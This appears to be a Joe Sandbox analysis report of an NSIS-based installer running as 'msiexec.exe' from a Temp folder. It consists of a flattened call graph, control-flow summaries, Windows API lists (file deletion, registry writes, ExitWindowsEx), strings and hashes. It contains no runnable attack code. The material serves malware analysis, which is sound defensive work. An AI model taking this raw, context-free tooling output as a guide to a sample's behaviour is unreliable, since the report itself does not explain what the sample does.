404424 GetDiskFreeSpaceA 3607->3609 3608->3603 3611 405546 2 API calls 3608->3611 3613 404468 3608->3613 3612 404446 MulDiv 3609->3612 3609->3613 3611->3608 3612->3613 3614 4044c5 3613->3614 3615 404597 21 API calls 3613->3615 3616 4044e8 3614->3616 3618 40140b 2 API calls 3614->3618 3617 4044b7 3615->3617 3630 403de0 EnableWindow 3616->3630 3620 4044c7 SetDlgItemTextA 3617->3620 3621 4044bc 3617->3621 3618->3616 3620->3614 3623 404597 21 API calls 3621->3623 3622 404504 3622->3576 3631 404191 3622->3631 3623->3614 3625->3569 3626->3597 3627->3578 3628->3598 3629->3606 3630->3622 3632 4041a4 SendMessageA 3631->3632 3633 40419f 3631->3633 3632->3576 3633->3632 3634 4014fe 3635 401506 3634->3635 3637 401519 3634->3637 3636 4029d9 18 API calls 3635->3636 3636->3637 3638 401000 3639 401037 BeginPaint GetClientRect 3638->3639 3640 40100c DefWindowProcA 3638->3640 3642 4010f3 3639->3642 3643 401179 3640->3643 3644 401073 CreateBrushIndirect FillRect DeleteObject 3642->3644 3645 4010fc 3642->3645 3644->3642 3646 401102 CreateFontIndirectA 3645->3646 3647 401167 EndPaint 3645->3647 3646->3647 3648 401112 6 API calls 3646->3648 3647->3643 3648->3647 3649 402303 3650 402309 3649->3650 3651 4029f6 18 API calls 3650->3651 3652 40231b 3651->3652 3653 4029f6 18 API calls 3652->3653 3654 402325 RegCreateKeyExA 3653->3654 3655 40288b 3654->3655 3656 40234f 3654->3656 3657 402367 3656->3657 3658 4029f6 18 API calls 3656->3658 3659 402373 3657->3659 3662 4029d9 18 API calls 3657->3662 3661 402360 lstrlenA 3658->3661 3660 40238e RegSetValueExA 3659->3660 3663 402e5b 33 API calls 3659->3663 3664 4023a4 RegCloseKey 3660->3664 3661->3657 3662->3659 3663->3660 3664->3655 3666 402803 3667 4029d9 18 API calls 3666->3667 3668 402809 3667->3668 3669 40283a 3668->3669 3670 40265c 3668->3670 3672 402817 3668->3672 3669->3670 3671 405a2e 18 API calls 3669->3671 3671->3670 3672->3670 3674 40596a wsprintfA 3672->3674 3674->3670 3675 403f06 3677 403f1c 3675->3677 3681 404029 3675->3681 3676 404098 3679 4040a2 GetDlgItem 3676->3679 3680 40416c 3676->3680 3678 403dbe 19 API calls 3677->3678 3682 403f72 3678->3682 3683 4040b8 3679->3683 3684 40412a 3679->3684 3686 403e25 8 API calls 3680->3686 3681->3676 3681->3680 3687 40406d GetDlgItem SendMessageA 3681->3687 3685 403dbe 19 API calls 3682->3685 3683->3684 3690 4040de 6 API calls 3683->3690 3684->3680 3691 40413c 3684->3691 3688 403f7f CheckDlgButton 3685->3688 3689 404167 3686->3689 3706 403de0 EnableWindow 3687->3706 3704 403de0 EnableWindow 3688->3704 3690->3684 3695 404142 SendMessageA 3691->3695 3696 404153 3691->3696 3693 404093 3697 404191 SendMessageA 3693->3697 3695->3696 3696->3689 3699 404159 SendMessageA 3696->3699 3697->3676 3698 403f9d GetDlgItem 3705 403df3 SendMessageA 3698->3705 3699->3689 3701 403fb3 SendMessageA 3702 403fd1 GetSysColor 3701->3702 3703 403fda SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 3701->3703 3702->3703 3703->3689 3704->3698 3705->3701 3706->3693 3707 401b06 3708 401b13 3707->3708 3709 401b57 3707->3709 3710 4021fb 3708->3710 3717 401b2a 3708->3717 3711 401b80 GlobalAlloc 3709->3711 3712 401b5b 3709->3712 3714 405a2e 18 API calls 3710->3714 3713 405a2e 18 API calls 3711->3713 3720 401b9b 3712->3720 3728 405a0c lstrcpynA 3712->3728 3713->3720 3716 402208 3714->3716 3721 4052cd MessageBoxIndirectA 3716->3721 3726 405a0c lstrcpynA 3717->3726 3718 401b6d GlobalFree 3718->3720 3721->3720 3722 401b39 3727 405a0c lstrcpynA 3722->3727 3724 401b48 3729 405a0c lstrcpynA 3724->3729 3726->3722 3727->3724 3728->3718 3729->3720 3730 402506 3731 4029d9 18 API calls 3730->3731 3734 402510 3731->3734 3732 402586 3733 402544 ReadFile 3733->3732 3733->3734 3734->3732 3734->3733 3735 402588 3734->3735 3737 402598 3734->3737 3739 40596a wsprintfA 3735->3739 3737->3732 3738 4025ae SetFilePointer 3737->3738 3738->3732 3739->3732 2808 401389 2810 401390 2808->2810 2809 4013fe 2810->2809 2811 4013cb MulDiv SendMessageA 2810->2811 2811->2810 3740 401c8a 3741 4029d9 18 API calls 3740->3741 3742 401c91 3741->3742 3743 4029d9 18 API calls 3742->3743 3744 401c99 GetDlgItem 3743->3744 3745 4024b8 3744->3745 3746 403513 3747 40351e 3746->3747 3748 403522 3747->3748 3749 403525 GlobalAlloc 3747->3749 3749->3748 2804 401595 2805 4029f6 18 API calls 2804->2805 2806 40159c SetFileAttributesA 2805->2806 2807 4015ae 2806->2807 3750 402615 3751 402618 3750->3751 3755 402630 3750->3755 3752 402625 FindNextFileA 3751->3752 3753 40266f 3752->3753 3752->3755 3756 405a0c lstrcpynA 3753->3756 3756->3755 3757 401d95 3758 4029d9 18 API calls 3757->3758 3759 401d9b 3758->3759 3760 4029d9 18 API calls 3759->3760 3761 401da4 3760->3761 3762 401db6 EnableWindow 3761->3762 3763 401dab ShowWindow 3761->3763 3764 40288b 3762->3764 3763->3764 3765 401e95 3766 4029f6 18 API calls 3765->3766 3767 401e9c 3766->3767 3768 405d07 2 API calls 3767->3768 3769 401ea2 3768->3769 3771 401eb4 3769->3771 3772 40596a wsprintfA 3769->3772 3772->3771 3773 401696 3774 4029f6 18 API calls 3773->3774 3775 40169c GetFullPathNameA 3774->3775 3778 4016b3 3775->3778 3782 4016d4 3775->3782 3776 4016e8 GetShortPathNameA 3777 40288b 3776->3777 3779 405d07 2 API calls 3778->3779 3778->3782 3780 4016c4 3779->3780 3780->3782 3783 405a0c lstrcpynA 3780->3783 3782->3776 3782->3777 3783->3782 3784 401d1b GetDC GetDeviceCaps 3785 4029d9 18 API calls 3784->3785 3786 401d37 MulDiv 3785->3786 3787 4029d9 18 API calls 3786->3787 3788 401d4c 3787->3788 3789 405a2e 18 API calls 3788->3789 3790 401d85 CreateFontIndirectA 3789->3790 3791 4024b8 3790->3791 3792 401e1b 3793 4029f6 18 API calls 3792->3793 3794 401e21 3793->3794 3795 404daa 25 API calls 3794->3795 3796 401e2b 3795->3796 3797 40526c 2 API calls 3796->3797 3798 401e31 3797->3798 3799 40265c 3798->3799 3800 401e87 CloseHandle 3798->3800 3801 401e50 WaitForSingleObject 3798->3801 3803 405d67 2 API calls 3798->3803 3800->3799 3801->3798 3802 401e5e GetExitCodeProcess 3801->3802 3804 401e70 3802->3804 3805 401e79 3802->3805 3803->3801 3807 40596a wsprintfA 3804->3807 3805->3800 3807->3805 3808 40249c 3809 4029f6 18 API calls 3808->3809 3810 4024a3 3809->3810 3813 4056e3 GetFileAttributesA CreateFileA 3810->3813 3812 4024af 3813->3812 3814 402020 3815 4029f6 18 API calls 3814->3815 3816 402027 3815->3816 3817 4029f6 18 API calls 3816->3817 3818 402031 3817->3818 3819 4029f6 18 API calls 3818->3819 3820 40203a 3819->3820 3821 4029f6 18 API calls 3820->3821 3822 402044 3821->3822 3823 4029f6 18 API calls 3822->3823 3825 40204e 3823->3825 3824 402062 CoCreateInstance 3829 402081 3824->3829 3830 402137 3824->3830 3825->3824 3826 4029f6 18 API calls 3825->3826 3826->3824 3827 401423 25 API calls 3828 402169 3827->3828 3829->3830 3831 402116 MultiByteToWideChar 3829->3831 3830->3827 3830->3828 3831->3830 2690 401721 2691 4029f6 18 API calls 2690->2691 2692 401728 2691->2692 2696 405712 2692->2696 2694 40172f 2695 405712 2 API calls 2694->2695 2695->2694 2697 40571d GetTickCount GetTempFileNameA 2696->2697 2698 405749 2697->2698 2699 40574d 2697->2699 2698->2697 2698->2699 2699->2694 3832 401922 3833 4029f6 18 API calls 3832->3833 3834 401929 lstrlenA 3833->3834 3835 4024b8 3834->3835 3836 402223 3837 40222b 3836->3837 3840 402231 3836->3840 3838 4029f6 18 API calls 3837->3838 3838->3840 3839 402241 3842 40224f 3839->3842 3843 4029f6 18 API calls 3839->3843 3840->3839 3841 4029f6 18 API calls 3840->3841 3841->3839 3844 4029f6 18 API calls 3842->3844 3843->3842 3845 402258 WritePrivateProfileStringA 3844->3845 3846 401ca5 3847 4029d9 18 API calls 3846->3847 3848 401cb5 SetWindowLongA 3847->3848 3849 40288b 3848->3849 3850 401a26 3851 4029d9 18 API calls 3850->3851 3852 401a2c 3851->3852 3853 4029d9 18 API calls 3852->3853 3854 4019d6 3853->3854 3855 402427 3856 402b00 19 API calls 3855->3856 3857 402431 3856->3857 3858 4029d9 18 API calls 3857->3858 3859 40243a 3858->3859 3860 402451 RegEnumKeyA 3859->3860 3861 40245d RegEnumValueA 3859->3861 3863 40265c 3859->3863 3862 402476 RegCloseKey 3860->3862 3861->3862 3861->3863 3862->3863 3865 4022a7 3866 4022d7 3865->3866 3867 4022ac 3865->3867 3869 4029f6 18 API calls 3866->3869 3868 402b00 19 API calls 3867->3868 3870 4022b3 3868->3870 3872 4022de 3869->3872 3871 4029f6 18 API calls 3870->3871 3875 4022f4 3870->3875 3873 4022c4 RegDeleteValueA RegCloseKey 3871->3873 3876 402a36 RegOpenKeyExA 3872->3876 3873->3875 3879 402a61 3876->3879 3885 402aad 3876->3885 3877 402a87 RegEnumKeyA 3878 402a99 RegCloseKey 3877->3878 3877->3879 3881 405d2e 3 API calls 3878->3881 3879->3877 3879->3878 3880 402abe RegCloseKey 3879->3880 3882 402a36 3 API calls 3879->3882 3880->3885 3883 402aa9 3881->3883 3882->3879 3884 402ad9 RegDeleteKeyA 3883->3884 3883->3885 3884->3885 3885->3875 3886 401bad 3887 4029d9 18 API calls 3886->3887 3888 401bb4 3887->3888 3889 4029d9 18 API calls 3888->3889 3890 401bbe 3889->3890 3891 4029f6 18 API calls 3890->3891 3892 401bce 3890->3892 3891->3892 3893 4029f6 18 API calls 3892->3893 3897 401bde 3892->3897 3893->3897 3894 401be9 3898 4029d9 18 API calls 3894->3898 3895 401c2d 3896 4029f6 18 API calls 3895->3896 3900 401c32 3896->3900 3897->3894 3897->3895 3899 401bee 3898->3899 3901 4029d9 18 API calls 3899->3901 3902 4029f6 18 API calls 3900->3902 3903 401bf7 3901->3903 3904 401c3b FindWindowExA 3902->3904 3905 401c1d SendMessageA 3903->3905 3906 401bff SendMessageTimeoutA 3903->3906 3907 401c59 3904->3907 3905->3907 3906->3907 3148 4023af 3159 402b00 3148->3159 3150 4023b9 3151 4029f6 18 API calls 3150->3151 3152 4023c2 3151->3152 3153 4023cc RegQueryValueExA 3152->3153 3155 40265c 3152->3155 3154 4023ec 3153->3154 3158 4023f2 RegCloseKey 3153->3158 3154->3158 3163 40596a wsprintfA 3154->3163 3158->3155 3160 4029f6 18 API calls 3159->3160 3161 402b19 3160->3161 3162 402b27 RegOpenKeyExA 3161->3162 3162->3150 3163->3158 3908 404531 3909 404541 3908->3909 3910 40455d 3908->3910 3919 4052b1 GetDlgItemTextA 3909->3919 3912 404590 3910->3912 3913 404563 SHGetPathFromIDListA 3910->3913 3915 40457a SendMessageA 3913->3915 3916 404573 3913->3916 3914 40454e SendMessageA 3914->3910 3915->3912 3918 40140b 2 API calls 3916->3918 3918->3915 3919->3914 2700 4015b3 2701 4029f6 18 API calls 2700->2701 2702 4015ba 2701->2702 2718 405593 CharNextA CharNextA 2702->2718 2704 40160a 2706 40162d 2704->2706 2707 40160f 2704->2707 2705 40552a CharNextA 2708 4015d0 CreateDirectoryA 2705->2708 2712 401423 25 API calls 2706->2712 2709 401423 25 API calls 2707->2709 2710 4015e5 GetLastError 2708->2710 2714 4015c2 2708->2714 2711 401616 2709->2711 2713 4015f2 GetFileAttributesA 2710->2713 2710->2714 2724 405a0c lstrcpynA 2711->2724 2716 402169 2712->2716 2713->2714 2714->2704 2714->2705 2717 401621 SetCurrentDirectoryA 2717->2716 2719 4055ad 2718->2719 2723 4055b9 2718->2723 2720 4055b4 CharNextA 2719->2720 2719->2723 2721 4055d6 2720->2721 2721->2714 2722 40552a CharNextA 2722->2723 2723->2721 2723->2722 2724->2717 2725 401734 2726 4029f6 18 API calls 2725->2726 2727 40173b 2726->2727 2728 401761 2727->2728 2729 401759 2727->2729 2787 405a0c lstrcpynA 2728->2787 2786 405a0c lstrcpynA 2729->2786 2732 40175f 2736 405c6e 5 API calls 2732->2736 2733 40176c 2788 4054ff lstrlenA CharPrevA 2733->2788 2743 40177e 2736->2743 2738 4017bf 2794 4056c4 GetFileAttributesA 2738->2794 2741 401795 CompareFileTime 2741->2743 2742 401859 2744 404daa 25 API calls 2742->2744 2743->2738 2743->2741 2743->2742 2746 405a0c lstrcpynA 2743->2746 2752 405a2e 18 API calls 2743->2752 2763 401830 2743->2763 2764 4056e3 GetFileAttributesA CreateFileA 2743->2764 2791 405d07 FindFirstFileA 2743->2791 2797 4052cd 2743->2797 2747 401863 2744->2747 2745 404daa 25 API calls 2751 401845 2745->2751 2746->2743 2765 402e5b 2747->2765 2750 40188a SetFileTime 2753 40189c CloseHandle 2750->2753 2752->2743 2753->2751 2754 4018ad 2753->2754 2755 4018b2 2754->2755 2756 4018c5 2754->2756 2758 405a2e 18 API calls 2755->2758 2757 405a2e 18 API calls 2756->2757 2759 4018cd 2757->2759 2761 4018ba lstrcatA 2758->2761 2762 4052cd MessageBoxIndirectA 2759->2762 2761->2759 2762->2751 2763->2745 2763->2751 2764->2743 2766 402e71 2765->2766 2767 402e9f 2766->2767 2803 4030af SetFilePointer 2766->2803 2801 40307d ReadFile 2767->2801 2771 403011 2773 403015 2771->2773 2774 40302d 2771->2774 2772 402ebc GetTickCount 2777 401876 2772->2777 2785 402f0b 2772->2785 2775 40307d ReadFile 2773->2775 2774->2777 2778 40307d ReadFile 2774->2778 2779 403048 WriteFile 2774->2779 2775->2777 2776 40307d ReadFile 2776->2785 2777->2750 2777->2753 2778->2774 2779->2777 2780 40305d 2779->2780 2780->2774 2780->2777 2781 402f61 GetTickCount 2781->2785 2782 402f86 MulDiv wsprintfA 2783 404daa 25 API calls 2782->2783 2783->2785 2784 402fc4 WriteFile 2784->2777 2784->2785 2785->2776 2785->2777 2785->2781 2785->2782 2785->2784 2786->2732 2787->2733 2789 401772 lstrcatA 2788->2789 2790 405519 lstrcatA 2788->2790 2789->2732 2790->2789 2792 405d28 2791->2792 2793 405d1d FindClose 2791->2793 2792->2743 2793->2792 2795 4056e0 2794->2795 2796 4056d3 SetFileAttributesA 2794->2796 2795->2743 2796->2795 2798 4052e2 2797->2798 2799 4052f6 MessageBoxIndirectA 2798->2799 2800 40532e 2798->2800 2799->2800 2800->2743 2802 402eaa 2801->2802 2802->2771 2802->2772 2802->2777 2803->2767 3920 401634 3921 4029f6 18 API calls 3920->3921 3922 40163a 3921->3922 3923 405d07 2 API calls 3922->3923 3924 401640 3923->3924 3925 401934 3926 4029d9 18 API calls 3925->3926 3927 40193b 3926->3927 3928 4029d9 18 API calls 3927->3928 3929 401945 3928->3929 3930 4029f6 18 API calls 3929->3930 3931 40194e 3930->3931 3932 401961 lstrlenA 3931->3932 3933 40199c 3931->3933 3934 40196b 3932->3934 3934->3933 3938 405a0c lstrcpynA 3934->3938 3936 401985 3936->3933 3937 401992 lstrlenA 3936->3937 3937->3933 3938->3936 3939 4041b5 3940 4041c5 3939->3940 3941 4041eb 3939->3941 3942 403dbe 19 API calls 3940->3942 3943 403e25 8 API calls 3941->3943 3944 4041d2 SetDlgItemTextA 3942->3944 3945 4041f7 3943->3945 3944->3941 3946 4019b5 3947 4029f6 18 API calls 3946->3947 3948 4019bc 3947->3948 3949 4029f6 18 API calls 3948->3949 3950 4019c5 3949->3950 3951 4019cc lstrcmpiA 3950->3951 3952 4019de lstrcmpA 3950->3952 3953 4019d2 3951->3953 3952->3953 3954 4014b7 3955 4014bd 3954->3955 3956 401389 2 API calls 3955->3956 3957 4014c5 3956->3957 3958 402b3b 3959 402b63 3958->3959 3960 402b4a SetTimer 3958->3960 3961 402bb8 3959->3961 3962 402b7d MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 3959->3962 3960->3959 3962->3961 3963 40263e 3964 4029f6 18 API calls 3963->3964 3965 402645 FindFirstFileA 3964->3965 3966 402668 3965->3966 3969 402658 3965->3969 3967 40266f 3966->3967 3971 40596a wsprintfA 3966->3971 3972 405a0c lstrcpynA 3967->3972 3971->3967 3972->3969 3973 4024be 3974 4024c3 3973->3974 3975 4024d4 3973->3975 3976 4029d9 18 API calls 3974->3976 3977 4029f6 18 API calls 3975->3977 3979 4024ca 3976->3979 3978 4024db lstrlenA 3977->3978 3978->3979 3980 4024fa WriteFile 3979->3980 3981 40265c 3979->3981 3980->3981

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 0 4030fa-40318f #17 SetErrorMode OleInitialize call 405d2e SHGetFileInfoA call 405a0c GetCommandLineA call 405a0c GetModuleHandleA 7 403191-403196 0->7 8 40319b-4031b0 call 40552a CharNextA 0->8 7->8 11 403215-403219 8->11 12 4031b2-4031b5 11->12 13 40321b 11->13 15 4031b7-4031bb 12->15 16 4031bd-4031c5 12->16 14 40322e-403246 GetTempPathA call 4030c6 13->14 25 403268-403274 DeleteFileA call 402c22 14->25 26 403248-403266 GetWindowsDirectoryA lstrcatA call 4030c6 14->26 15->15 15->16 17 4031c7-4031c8 16->17 18 4031cd-4031d0 16->18 17->18 20 4031d2-4031d6 18->20 21 403205-403212 call 40552a 18->21 23 4031e6-4031ec 20->23 24 4031d8-4031e1 20->24 21->11 38 403214 21->38 30 4031fc-403203 23->30 31 4031ee-4031f7 23->31 24->23 28 4031e3 24->28 37 403279-40327f 25->37 26->25 40 4032e6-4032f5 ExitProcess OleUninitialize 26->40 28->23 30->21 36 40321d-403229 call 405a0c 30->36 31->30 35 4031f9 31->35 35->30 36->14 37->40 41 403281-403287 37->41 38->11 44 4033e0-4033e6 40->44 45 4032fb-40330b call 4052cd ExitProcess 40->45 42 4032d6-4032e2 call 403555 41->42 43 403289-403292 call 40552a 41->43 42->40 58 40329d-40329f 43->58 47 403463-40346b 44->47 48 4033e8-403405 call 405d2e * 3 44->48 54 403471-403475 ExitProcess 47->54 55 40346d 47->55 73 403407-403409 48->73 74 40344f-40345a ExitWindowsEx 48->74 55->54 59 4032a1-4032ab 58->59 60 403294-40329a 58->60 63 403311-40332b lstrcatA lstrcmpiA 59->63 64 4032ad-4032ba call 4055e0 59->64 60->59 62 40329c 60->62 62->58 63->40 66 40332d-403342 CreateDirectoryA SetCurrentDirectoryA 63->66 64->40 76 4032bc-4032d2 call 405a0c * 2 64->76 70 403344-40334a call 405a0c 66->70 71 40334f-403369 call 405a0c 66->71 70->71 84 40336e-40338a call 405a2e DeleteFileA 71->84 73->74 78 40340b-40340d 73->78 74->47 81 40345c-40345e call 40140b 74->81 76->42 78->74 82 40340f-403421 GetCurrentProcess 78->82 81->47 82->74 91 403423-403445 82->91 92 4033cb-4033d2 84->92 93 40338c-40339c CopyFileA 84->93 91->74 92->84 94 4033d4-4033db call 40575a 92->94 93->92 95 40339e-4033be call 40575a call 405a2e call 40526c 93->95 94->40 95->92 105 4033c0-4033c7 CloseHandle 95->105 105->92
            APIs
            • #17.COMCTL32 ref: 00403119
            • SetErrorMode.KERNEL32(00008001), ref: 00403124
            • OleInitialize.OLE32(00000000), ref: 0040312B
              • Part of subcall function 00405D2E: GetModuleHandleA.KERNEL32(?,?,00000000,0040313D,00000008), ref: 00405D40
              • Part of subcall function 00405D2E: LoadLibraryA.KERNEL32(?), ref: 00405D4B
              • Part of subcall function 00405D2E: GetProcAddress.KERNEL32(00000000,?,?,00000000,0040313D,00000008), ref: 00405D5C
            • SHGetFileInfoA.SHELL32(00428F98,00000000,?,00000160,00000000,00000008), ref: 00403153
              • Part of subcall function 00405A0C: lstrcpynA.KERNEL32(?,?,00000400,00403168,0042E360,NSIS Error), ref: 00405A19
            • GetCommandLineA.KERNEL32(0042E360,NSIS Error), ref: 00403168
            • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" ,00000000), ref: 0040317B
            • CharNextA.USER32(00000000), ref: 004031A6
            • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403239
            • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040324E
            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040325A
            • DeleteFileA.KERNEL32(1033), ref: 0040326D
            • ExitProcess.KERNEL32(00000000), ref: 004032E6
            • OleUninitialize.OLE32 ref: 004032EB
            • ExitProcess.KERNEL32 ref: 0040330B
            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" ,00000000,00000000), ref: 00403317
            • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\MSI,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" ,00000000,00000000), ref: 00403323
            • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040332F
            • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403336
            • DeleteFileA.KERNEL32(00428B98,00428B98,?,0042F000,?), ref: 00403380
            • CopyFileA.KERNEL32 ref: 00403394
            • CloseHandle.KERNEL32(00000000), ref: 004033C1
            • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403416
            • ExitWindowsEx.USER32(00000002,00000000), ref: 00403452
            • ExitProcess.KERNEL32 ref: 00403475
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: ExitFileProcess$DirectoryHandle$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
            • String ID: /D=$ _?=$"$"C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\MSI$C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
            • API String ID: 553446912-3161323543
            • Opcode ID: b54f9db6f0d8b9b5cada0f3be399c619291e87e839e1cbb66da7d28003e7be7a
            • Instruction ID: 1e9e478c3a9e7f3573a82b9cae4fcf3dc9ecc54075f91e84b1854e8c20532e3f
            • Opcode Fuzzy Hash: b54f9db6f0d8b9b5cada0f3be399c619291e87e839e1cbb66da7d28003e7be7a
            • Instruction Fuzzy Hash: 4191D130A08344AFE7216F61AD4AB6B7E9CEB0530AF04057FF541B61D2C77C99058B6E
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 173 405331-40534c call 4055e0 176 405365-40536f 173->176 177 40534e-405360 DeleteFileA 173->177 179 405371-405373 176->179 180 405383-405391 call 405a0c 176->180 178 4054f9-4054fc 177->178 181 4054a4-4054aa 179->181 182 405379-40537d 179->182 188 4053a0-4053a1 call 405546 180->188 189 405393-40539e lstrcatA 180->189 181->178 184 4054ac-4054af 181->184 182->180 182->181 186 4054b1-4054b7 184->186 187 4054b9-4054c1 call 405d07 184->187 186->178 187->178 197 4054c3-4054d8 call 4054ff call 4056c4 RemoveDirectoryA 187->197 191 4053a6-4053a9 188->191 189->191 193 4053b4-4053ba lstrcatA 191->193 194 4053ab-4053b2 191->194 196 4053bf-4053dd lstrlenA FindFirstFileA 193->196 194->193 194->196 198 4053e3-4053fa call 40552a 196->198 199 40549a-40549e 196->199 212 4054f1-4054f4 call 404daa 197->212 213 4054da-4054de 197->213 206 405405-405408 198->206 207 4053fc-405400 198->207 199->181 201 4054a0 199->201 201->181 210 40540a-40540f 206->210 211 40541b-405429 call 405a0c 206->211 207->206 209 405402 207->209 209->206 215 405411-405413 210->215 216 405479-40548b FindNextFileA 210->216 224 405440-40544f call 4056c4 DeleteFileA 211->224 225 40542b-405433 211->225 212->178 213->186 218 4054e0-4054ef call 404daa call 40575a 213->218 215->211 221 405415-405419 215->221 216->198 219 405491-405494 FindClose 216->219 218->178 219->199 221->211 221->216 233 405471-405474 call 404daa 224->233 234 405451-405455 224->234 225->216 226 405435-40543e call 405331 225->226 226->216 233->216 235 405457-405467 call 404daa call 40575a 234->235 236 405469-40546f 234->236 235->216 236->216
            APIs
            • DeleteFileA.KERNEL32(?,?,"C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" ,00000000), ref: 0040534F
            • lstrcatA.KERNEL32(0042AFE8,\*.*,0042AFE8,?,00000000,?,"C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" ,00000000), ref: 00405399
            • lstrcatA.KERNEL32(?,00409010,?,0042AFE8,?,00000000,?,"C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" ,00000000), ref: 004053BA
            • lstrlenA.KERNEL32(?,?,00409010,?,0042AFE8,?,00000000,?,"C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" ,00000000), ref: 004053C0
            • FindFirstFileA.KERNEL32(0042AFE8,?,?,?,00409010,?,0042AFE8,?,00000000,?,"C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" ,00000000), ref: 004053D1
            • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 00405483
            • FindClose.KERNEL32(?), ref: 00405494
            Strings
            • \*.*, xrefs: 00405393
            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405331
            • "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" , xrefs: 0040533B
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
            • String ID: "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
            • API String ID: 2035342205-2130711221
            • Opcode ID: eeee1fe6d78b479acfa35fd6cd9b42f31f1d942e4a3e46f321804d068e117fb2
            • Instruction ID: 46a167c19d0f92bb62e791f7a1b0a3e0954e7dde2177130d433e16ae92940f3d
            • Opcode Fuzzy Hash: eeee1fe6d78b479acfa35fd6cd9b42f31f1d942e4a3e46f321804d068e117fb2
            • Instruction Fuzzy Hash: 84510130904A5476DB21AB218C85BFF3A68DF4231AF14813BF941752D2C77C49C2DE5E
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 469 405d07-405d1b FindFirstFileA 470 405d28 469->470 471 405d1d-405d26 FindClose 469->471 472 405d2a-405d2b 470->472 471->472
            APIs
            • FindFirstFileA.KERNEL32(?,0042C030,0042B3E8,00405623,0042B3E8,0042B3E8,00000000,0042B3E8,0042B3E8,?,?,00000000,00405345,?,"C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" ,00000000), ref: 00405D12
            • FindClose.KERNEL32(00000000), ref: 00405D1E
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
